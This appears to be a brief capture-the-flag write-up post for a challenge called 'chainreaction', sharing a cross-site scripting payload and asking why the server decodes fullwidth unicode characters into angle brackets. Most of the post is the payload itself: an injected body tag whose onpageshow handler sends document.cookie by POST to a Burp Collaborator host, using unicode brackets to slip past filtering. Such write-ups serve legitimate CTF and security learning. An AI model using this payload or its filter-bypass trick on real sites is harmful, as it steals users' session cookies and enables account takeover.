Tags: xss
Rating: 2.0
My XSS payload for chainreaction, using unicoded less/greater-than + whitelistd event:
```
a10asd"><body onpageshow="fetch('https://xxxx.burpcollaborator.net', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});">
```
Why the server decodes 0xEF 0xBC 0x9E to 0x3C? There is a specific function? Is it the default server behavior?
